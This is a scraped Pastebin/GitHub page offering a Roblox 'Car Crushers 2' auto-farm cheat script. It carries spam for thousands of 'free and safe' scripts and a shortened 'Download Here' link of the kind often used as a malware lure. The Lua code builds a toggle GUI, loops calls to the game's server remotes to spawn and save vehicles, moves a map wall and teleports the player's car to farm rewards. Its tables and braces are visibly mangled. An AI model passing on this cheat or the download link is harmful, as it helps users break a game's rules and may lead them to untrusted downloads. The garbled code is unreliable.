Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -
- Download Here --> https://tinyurl.com/muw2vxtn?id55361687 (Copy and Paste Link)
- Script-Pastebin/Car-Crusher-2-Script-pastebin-roblox
- This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Name already in use
- A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
- Sign In Required
- Please sign in to use Codespaces.
- Launching GitHub Desktop
- If nothing happens, download GitHub Desktop and try again.
- Launching GitHub Desktop
- If nothing happens, download GitHub Desktop and try again.
- Launching Xcode
- If nothing happens, download Xcode and try again.
- Launching Visual Studio Code
- Your codespace will open once ready.
- There was a problem preparing your codespace, please try again.
- Latest commit
- Git stats
- Files
- Failed to load latest commit information.
- README.md
- Hey 👋 Robloxian Glad to see you here!
- Get More Than 5500 Roblox Scripts Pastebin. Daily script updates for various Roblox Mode, all are free and safe. Our quality control assures an unbeatable experience!Get Best Verified Script Pastebin Roblox on :
- Best alternative Pastebin for verified Script Pastebin:
- Roblox Script -- Car Crushers 2 [Auto Farm]
- local ScreenGui = Instance.new("ScreenGui")local Frame = Instance.new("Frame")local AutoFarmButton = Instance.new("TextButton")local DisableAutoFarmButton = Instance.new("TextButton")local NameOfTheGUI = Instance.new("TextLabel")local NameOfTheGUI_2 = Instance.new("TextLabel")local EnabledOrDisabledBar = Instance.new("ImageButton")local EnabledBar = Instance.new("ImageButton")local EnabledTextOnBar = Instance.new("TextLabel")local DisabledBar = Instance.new("ImageButton")local DisabledTextOnBar = Instance.new("TextLabel")local TextButton = Instance.new("TextButton")--Properties:ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling Frame.Parent = ScreenGuiFrame.Active = trueFrame.BackgroundColor3 = Color3.new(0, 0.745098, 0)Frame.BorderSizePixel = 0Frame.Position = UDim2.new(0.373456776, 0, 0.372727275, 0)Frame.Selectable = trueFrame.Size = UDim2.new(0, 262, 0, 212)Frame.Draggable = true AutoFarmButton.Name = "AutoFarmButton"AutoFarmButton.Parent = FrameAutoFarmButton.BackgroundColor3 = Color3.new(0, 0, 0)AutoFarmButton.BorderSizePixel = 0AutoFarmButton.Position = UDim2.new(0.141221374, 0, 0.216436312, 0)AutoFarmButton.Size = UDim2.new(0, 187, 0, 47)AutoFarmButton.Font = Enum.Font.FantasyAutoFarmButton.Text = "AutoFarm"AutoFarmButton.TextColor3 = Color3.new(1, 1, 1)AutoFarmButton.TextSize = 40AutoFarmButton.TextStrokeColor3 = Color3.new(1, 1, 1)AutoFarmButton.TextStrokeTransparency = 0.60000002384186AutoFarmButton.TextWrapped = trueAutoFarmButton.MouseButton1Down:connect(function()game:GetService("StarterGui"):SetCore("SendNotification", )EnabledBar.Visible = trueDisabledBar.Visible = false_G.Enabled = true_G.VehicleName = "UAZ"while _G.Enabled dowait()local Arguments = [1] = "Save",[2] = ["BodyColor"] = "Institutional white",["BodyMaterial"] = "Platinum">,[3] = _G.VehicleName> game.ReplicatedStorage.rF['LoadSaveCustoms']:InvokeServer(unpack(Arguments))game:GetService("ReplicatedStorage").rF.SpawnVehicle:InvokeServer(_G.VehicleName)for i=1,10 dowait(0.5)game.Workspace["All crushers"]["Stair Fall"].Wall.CFrame = CFrame.new(0,900,0)game.Workspace["All crushers"]["Stair Fall"].Wall.Size = Vector3.new(10000,1,10000)game.Workspace["All crushers"]["Stair Fall"].Wall.CanCollide = falsegame.Workspace.CarCollection:findFirstChild(game.Players.LocalPlayer.Name).Car:MoveTo(Vector3.new(0,910,0))endendend) DisableAutoFarmButton.Name = "DisableAutoFarmButton"DisableAutoFarmButton.Parent = FrameDisableAutoFarmButton.BackgroundColor3 = Color3.new(0, 0, 0)DisableAutoFarmButton.BorderSizePixel = 0DisableAutoFarmButton.Position = UDim2.new(0.141221374, 0, 0.655501306, 0)DisableAutoFarmButton.Size = UDim2.new(0, 187, 0, 47)DisableAutoFarmButton.Font = Enum.Font.FantasyDisableAutoFarmButton.Text = "Turn off"DisableAutoFarmButton.TextColor3 = Color3.new(1, 1, 1)DisableAutoFarmButton.TextSize = 30DisableAutoFarmButton.TextStrokeColor3 = Color3.new(1, 1, 1)DisableAutoFarmButton.TextStrokeTransparency = 0.60000002384186DisableAutoFarmButton.TextWrapped = trueDisableAutoFarmButton.MouseButton1Down:connect(function()game:GetService("StarterGui"):SetCore("SendNotification", )EnabledBar.Visible = falseDisabledBar.Visible = true_G.Enabled = falseend) NameOfTheGUI.Name = "NameOfTheGUI"NameOfTheGUI.Parent = FrameNameOfTheGUI.BackgroundColor3 = Color3.new(0, 0.952941, 0)NameOfTheGUI.Position = UDim2.new(-0.0648854971, 0, 0, 0)NameOfTheGUI.Size = UDim2.new(0, 296, 0, 30)NameOfTheGUI.Font = Enum.Font.SourceSansNameOfTheGUI.Text = "Car Crushers 2 Script"NameOfTheGUI.TextColor3 = Color3.new(0, 0, 0)NameOfTheGUI.TextScaled = trueNameOfTheGUI.TextSize = 14NameOfTheGUI.TextWrapped = true NameOfTheGUI_2.Name = "NameOfTheGUI"NameOfTheGUI_2.Parent = FrameNameOfTheGUI_2.BackgroundColor3 = Color3.new(0, 0.952941, 0)NameOfTheGUI_2.Position = UDim2.new(-0.0648854971, 0, 1, 0)NameOfTheGUI_2.Size = UDim2.new(0, 296, 0, 30)NameOfTheGUI_2.Font = Enum.Font.SourceSansNameOfTheGUI_2.Text = "Made by MoXPer :d"NameOfTheGUI_2.TextColor3 = Color3.new(0, 0, 0)NameOfTheGUI_2.TextScaled = trueNameOfTheGUI_2.TextSize = 14NameOfTheGUI_2.TextWrapped = true EnabledOrDisabledBar.Name = "EnabledOrDisabledBar"EnabledOrDisabledBar.Parent = FrameEnabledOrDisabledBar.BackgroundColor3 = Color3.new(1, 1, 1)EnabledOrDisabledBar.BackgroundTransparency = 1EnabledOrDisabledBar.BorderSizePixel = 0EnabledOrDisabledBar.Position = UDim2.new(0.222070128, 0, 0.302132934, 0)EnabledOrDisabledBar.Size = UDim2.new(0, 145, 0, 100)EnabledOrDisabledBar.Image = "rbxassetid://939118523" EnabledBar.Name = "EnabledBar"EnabledBar.Parent = EnabledOrDisabledBarEnabledBar.BackgroundColor3 = Color3.new(1, 1, 1)EnabledBar.BackgroundTransparency = 1EnabledBar.Position = UDim2.new(0.337903947, 0, 0.133043513, 0)EnabledBar.Size = UDim2.new(0, 77, 0, 75)EnabledBar.Visible = falseEnabledBar.Image = "rbxassetid://939119635"EnabledBar.ImageColor3 = Color3.new(0.333333, 0.666667, 0) EnabledTextOnBar.Name = "EnabledTextOnBar"EnabledTextOnBar.Parent = EnabledBarEnabledTextOnBar.BackgroundColor3 = Color3.new(1, 1, 1)EnabledTextOnBar.BackgroundTransparency = 1EnabledTextOnBar.BorderSizePixel = 0EnabledTextOnBar.Position = UDim2.new(0.142857134, 0, 0.333333313, 0)EnabledTextOnBar.Size = UDim2.new(0, 55, 0, 24)EnabledTextOnBar.Font = Enum.Font.SourceSansEnabledTextOnBar.Text = "Enabled"EnabledTextOnBar.TextColor3 = Color3.new(0, 1, 0)EnabledTextOnBar.TextSize = 14 DisabledBar.Name = "DisabledBar"DisabledBar.Parent = EnabledOrDisabledBarDisabledBar.BackgroundColor3 = Color3.new(1, 1, 1)DisabledBar.BackgroundTransparency = 1DisabledBar.Position = UDim2.new(0.0970593691, 0, 0.128695682, 0)DisabledBar.Size = UDim2.new(0, 81, 0, 75)DisabledBar.Image = "rbxassetid://939126427"DisabledBar.ImageColor3 = Color3.new(0.666667, 0, 0) DisabledTextOnBar.Name = "DisabledTextOnBar"DisabledTextOnBar.Parent = DisabledBarDisabledTextOnBar.BackgroundColor3 = Color3.new(1, 1, 1)DisabledTextOnBar.BackgroundTransparency = 1DisabledTextOnBar.BorderSizePixel = 0DisabledTextOnBar.Position = UDim2.new(0.185185179, 0, 0.339130461, 0)DisabledTextOnBar.Size = UDim2.new(0, 49, 0, 27)DisabledTextOnBar.Font = Enum.Font.SourceSansDisabledTextOnBar.Text = "Disabled"DisabledTextOnBar.TextColor3 = Color3.new(1, 0, 0.0156863)DisabledTextOnBar.TextSize = 14 TextButton.Parent = FrameTextButton.BackgroundColor3 = Color3.new(0.470588, 0.862745, 0.188235)TextButton.BorderColor3 = Color3.new(0.807843, 0, 0)TextButton.BorderSizePixel = 0TextButton.Position = UDim2.new(0.938931286, 0, 0, 0)TextButton.Size = UDim2.new(0, 33, 0, 30)TextButton.Font = Enum.Font.SourceSansTextButton.Text = "X"TextButton.TextColor3 = Color3.new(0.54902, 0, 0)TextButton.TextSize = 40TextButton.TextWrapped = trueTextButton.MouseButton1Down:connect(function()Frame.Visible = falseTextButton.Visible = falseend)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement